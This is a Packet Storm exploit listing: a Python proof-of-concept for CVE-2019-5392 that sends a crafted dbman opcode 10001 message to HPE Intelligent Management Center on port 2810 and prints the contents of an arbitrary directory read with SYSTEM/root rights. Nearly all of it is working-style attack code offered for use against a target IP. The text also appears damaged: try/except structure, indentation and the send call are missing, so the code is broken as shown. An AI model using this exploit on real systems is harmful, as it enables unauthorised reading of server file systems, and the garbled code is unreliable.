HPE Intelligent Management Center Information Disclosure

Type packetstorm
Reporter Rishabh Sharma
Modified 2019-09-23T00:00:00


# Exploit Title: HPE Intelligent Management Center dbman Command 10001 Information Disclosure  
# Date: 22-09-2019  
# Exploit Author: Rishabh Sharma (Linkedin: rishabh2241991)  
# Vendor Homepage: www.hpe.com  
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=  
# Tested on Version: iMC_PLAT_7.1_E0302_Standard_Windows and iMC_PLAT_7.2_E0403_Std_Win  
# Tested on: Windows 7  
# CVE : CVE-2019-5392  
# Conversion of Nessus Plugin to Python Exploit  
# Nessus Plugin Name: hp_imc_dbman_cmd_10001_info_disclosure.nasl  
# Description: This vulnerability allow remote attacker to view the contents of arbitrary directories under the security context of the SYSTEM or root user.  
# See Also: https://www.tenable.com/plugins/nessus/118038  
from pyasn1.type.univ import *  
from pyasn1.type.namedtype import *  
from pyasn1.codec.ber import encoder  
import struct  
import binascii  
import socket, sys  
import sys  
import re  
if len(sys.argv) != 4:  
print "USAGE: python %s <ip> <port> <directory>" % (sys.argv[0])  
ip = sys.argv[1]  
port = int(sys.argv[2]) # Default Port 2810  
directory = sys.argv[3]  
payload = directory.replace("\\","\\\\")   
opcode = 10001  
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
print "Socket Created.."  
except socket.error:  
print 'Failed to create socket'  
victim_address = (ip,port)  
print('connecting to {} port {}'.format(*victim_address))  
sock.connect((ip, port))  
class DbmanMsg(Sequence):  
componentType = NamedTypes(  
NamedType('flag', Integer()),  
NamedType('dir', OctetString())  
data = DbmanMsg()  
data['flag'] = 1  
data['dir'] = payload  
encodeddata = encoder.encode(data, defMode=False)  
dataLen = len(encodeddata)  
values = (opcode, dataLen, encodeddata)  
s = struct.Struct(">ii%ds" % dataLen)  
packed_data = s.pack(*values)  
print 'Format string :', s.format  
print 'Uses :',s.size, 'bytes'  
print 'Packed Value :', binascii.hexlify(packed_data)  
print '\n'  
print 'Sending Payload...'  
BUFF_SIZE = 4000  
res = sock.recv(BUFF_SIZE)  
rec = len(res)  
if (rec == 0):  
print "No data in the directory"  
print "Data Recived: "+str(rec)  
a = repr(res)  
b = a  
b = re.sub(r'(x\d\d)', '', b)  
b = re.sub(r'(\\x[\d].)', '', b)  
b = re.sub(r'(\\x..)', '', b)  
replacestring = ['"','\\n','\\r','\\t','0']  
print "Data in "+payload+" Directory: \n"  
for r in replacestring:  
b = b.replace(r,'')  
b = b.replace("'","")  
#print b #Remove '#' if output results is not proper  
matches = re.finditer(r"([\\]*)([.[a-zA-Z\d\s]*)", b, re.MULTILINE)  
for matchNum, match in enumerate(matches, start=1):  
print match.group(2)  
print "Done..."